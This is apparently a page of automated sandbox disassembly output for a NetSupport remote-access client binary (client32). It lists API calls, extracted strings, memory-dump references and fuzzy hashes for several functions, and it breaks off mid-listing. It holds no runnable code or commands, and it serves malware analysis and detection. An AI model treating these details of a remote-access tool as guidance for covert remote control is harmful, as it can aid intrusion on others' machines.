Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SetWindowTextA.USER32(0002045A,00000000), ref: 11139CF7
IsWindowVisible.USER32(0002045A), ref: 11139DBC
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
IsWindowVisible.USER32(0002045A), ref: 11139DEA
SetForegroundWindow.USER32(00000000), ref: 11139E18
EnableWindow.USER32(0002045A,00000001), ref: 11139E27
IsWindowVisible.USER32(0002045A), ref: 11139E78
IsWindowVisible.USER32(0002045A), ref: 11139E85
EnableWindow.USER32(0002045A,00000000), ref: 11139E99
EnableWindow.USER32(0002045A,00000000), ref: 11139DFF

Part of subcall function 11132120: ShowWindow.USER32(0002045A,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144

EnableWindow.USER32(0002045A,00000001), ref: 11139EAD

Strings

ConnectedText, xrefs: 11139B88, 11139B97
LockedText, xrefs: 11139BCF
HideWhenIdle, xrefs: 11139AEC
ShowUIOnConnect, xrefs: 11139C2D
Client, xrefs: 11139AF1, 11139B9B, 11139BD4, 11139C32
ViewedText, xrefs: 11139B7B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 11030645
PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797

Strings

Ready, xrefs: 11030801
Global\NSMWClassAdmin, xrefs: 1103063A
_debug, xrefs: 110306A4
*ListenPort, xrefs: 1103073E
TraceIPC, xrefs: 1103069F
NSSWControl32, xrefs: 110307C1
TCPIP, xrefs: 11030743
UseIPC, xrefs: 1103066C
NSMWClass, xrefs: 1103062F
Default, xrefs: 1103078B, 110307BA, 110307E3
NSTWControl32, xrefs: 110307EA
Client, xrefs: 11030671
NSMWControl32, xrefs: 11030792

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePostwsprintf
String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
API String ID: 875889313-3431570279
Opcode ID: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
Opcode Fuzzy Hash: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95

Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(02AE8E08,00001388), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC

Strings

pcicl32, xrefs: 110314C5
Error %s unloading audiocap dll, xrefs: 11031603
&, xrefs: 11031585
, xrefs: 110313C2
j0U, xrefs: 11031554
*, xrefs: 11031381
.%d, xrefs: 110313F6
j, xrefs: 11031341

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
API String ID: 1428277488-3745656997
Opcode ID: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
Opcode Fuzzy Hash: 68ed8480d6958b2ac7d7fb7ebc491991a5e7665163c165e1b98fe1ba85b4c25f
Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752

Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetStockObject.GDI32(0000000D), ref: 110312E6
GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
InterlockedExchange.KERNEL32(02AE8E08,00001388), ref: 110313BA
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
_sprintf.LIBCMT ref: 11031401
_setlocale.LIBCMT ref: 1103140B

Strings

pcicl32, xrefs: 110314C5
Error %s unloading audiocap dll, xrefs: 11031603
&, xrefs: 11031585
, xrefs: 110313C2
j0U, xrefs: 11031554
*, xrefs: 11031381
.%d, xrefs: 110313F6
j, xrefs: 11031341

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
API String ID: 4242130455-3745656997
Opcode ID: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
Opcode Fuzzy Hash: 3ae6bce2a60a0fdfd5c31868ef0703f6b2060c5edf3e3339330c26d0fdaec795
Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52

Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

wsprintfA.USER32 ref: 11028814
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
wsprintfA.USER32 ref: 11028891
CloseHandle.KERNEL32(?), ref: 110288A7
CloseHandle.KERNEL32(?), ref: 110288B0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925

Strings

Setting resource langid=%d, xrefs: 110288D1
pcicl32_res.dll, xrefs: 110288E9
", xrefs: 110287EA
Locales\%d\, xrefs: 11028881
SetClientResLang called, gPlatform %x, xrefs: 110287BC
NSM.LIC, xrefs: 110287B9, 110288D0
\GetUserLang.exe", xrefs: 1102880E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-419896573
Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0

Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,0BAD89F8,02FB8970,02FB8960,?,00000000,1118368C,000000FF,?,11032002,02FB8970,00000000,?,?,?), ref: 11086115

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
wsprintfA.USER32 ref: 110861EB
wsprintfA.USER32 ref: 11086202
wsprintfA.USER32 ref: 11086219
CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A

Part of subcall function 11085D50: CloseHandle.KERNEL32(?,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085D68
Part of subcall function 11085D50: CloseHandle.KERNEL32(?,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085D7B
Part of subcall function 11085D50: CloseHandle.KERNEL32(?,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085D8E
Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,771AF550,?,?,11086390,?,11032002,02FB8970,00000000,?,?,?), ref: 11085DA1

Strings

Cancel, xrefs: 11086149
GetInventory, xrefs: 11086135
%s_HF.%s, xrefs: 11086213
%s_SW.%s, xrefs: 110861FC
PCIINV.DLL, xrefs: 11086110
%s_HW.%s, xrefs: 110861E2
GetInventoryEx, xrefs: 11086157

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 4263811268-2492245516
Opcode ID: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
Opcode Fuzzy Hash: 9add6b772f8b96242f208600117685c77274ddd20eb7f7d58a35d558fcdd73aa
Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94

Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
SetLastError.KERNEL32(00000078), ref: 11030D82
WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
CloseHandle.KERNEL32(?), ref: 11030DC9
FreeLibrary.KERNEL32(?), ref: 11030DD4
CloseHandle.KERNEL32(00000000), ref: 11030DDB

Strings

_debug\tracefile, xrefs: 11030C16
istaUI, xrefs: 11030BCD
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 11030BEA
_debug\trace, xrefs: 11030C04
/247, xrefs: 11030CD6
SetProcessDPIAware, xrefs: 11030D66
PCIMutex, xrefs: 11030CA3, 11030CC3

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
Opcode Fuzzy Hash: 1d9f851f1a35bbda09da46747162988cfd9d26cfc3fdf28e12350a95bf7e0c46
Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51

Function 6CEF1D3F Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 108threadCOMMON

Download Yara Rule

APIs

__set_flsgetvalue.MSVCR100(6CEF1DE0,00000008,6CEF1E16,00000001,?), ref: 6CEF1D6A

Part of subcall function 6CEF0341: TlsGetValue.KERNEL32(?,6CEF0713), ref: 6CEF034A

TlsGetValue.KERNEL32(6CEF1DE0,00000008,6CEF1E16,00000001,?), ref: 6CEF1D7B
_calloc_crt.MSVCR100(00000001,00000214), ref: 6CEF1D8E
DecodePointer.KERNEL32(00000000), ref: 6CEF1DAC
_initptd.MSVCR100(00000000,00000000), ref: 6CEF1DBE

Part of subcall function 6CEF1E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CEF1F38,00000008,6CF175E9,00000000,00000000), ref: 6CEF1EAC
Part of subcall function 6CEF1E9B: _lock.MSVCR100(0000000D), ref: 6CEF1EE0
Part of subcall function 6CEF1E9B: InterlockedIncrement.KERNEL32(?), ref: 6CEF1EED
Part of subcall function 6CEF1E9B: _lock.MSVCR100(0000000C), ref: 6CEF1F01

GetCurrentThreadId.KERNEL32 ref: 6CEF1DC5
__freeptd.LIBCMT ref: 6CEF2971
__heap_init.LIBCMT ref: 6CEFB8B1
GetCommandLineA.KERNEL32(6CEF1DE0,00000008,6CEF1E16,00000001,?), ref: 6CEFB8E2
GetCommandLineW.KERNEL32 ref: 6CEFB8ED
__ioterm.LIBCMT ref: 6CF07B7E
free.MSVCR100(00000000), ref: 6CF17485

Strings

(8, xrefs: 6CEFB8E8

Memory Dump Source

Source File: 00000003.00000002.3710952050.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000003.00000002.3710934142.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711022108.000000006CF94000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711041416.000000006CF96000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711061539.000000006CF99000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cee0000_client32.jbxd

Similarity

API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
String ID: (8
API String ID: 2121586863-1983883597
Opcode ID: 0164ae6c8e0ba914ef95c4d87216acc5ed57a66cb1d50801528ef3b732c654a6
Instruction ID: 427bf8f2cd18e94b4a6afeab337c5383fc064dad188fd5ce60383cbb4fcbf10d
Opcode Fuzzy Hash: 0164ae6c8e0ba914ef95c4d87216acc5ed57a66cb1d50801528ef3b732c654a6
Instruction Fuzzy Hash: 4931D2B1B49646DADF502FFA891068E3AB4EF4775E730151BE474C5E44DF32C046AA22

Function 11134D90 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA

AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
GetSystemMetrics.USER32(00000021), ref: 11134DF9
GetSystemMetrics.USER32(0000000F), ref: 11134E01
GetSystemMetrics.USER32(00000004), ref: 11134E07
GetDC.USER32(00000000), ref: 11134E13
GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
CreateWindowExA.USER32(00000001,NSMWClass,02FA0600,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87

Strings

mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 11134E3E
CreateMainWnd, hwnd=%x, e=%d, xrefs: 11134E8F
NSMWClass, xrefs: 11134E79
F(t, xrefs: 11134E1E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: F(t$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-3627231027
Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4

Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,0BAD89F8,?,00000000,00000000), ref: 1102D594
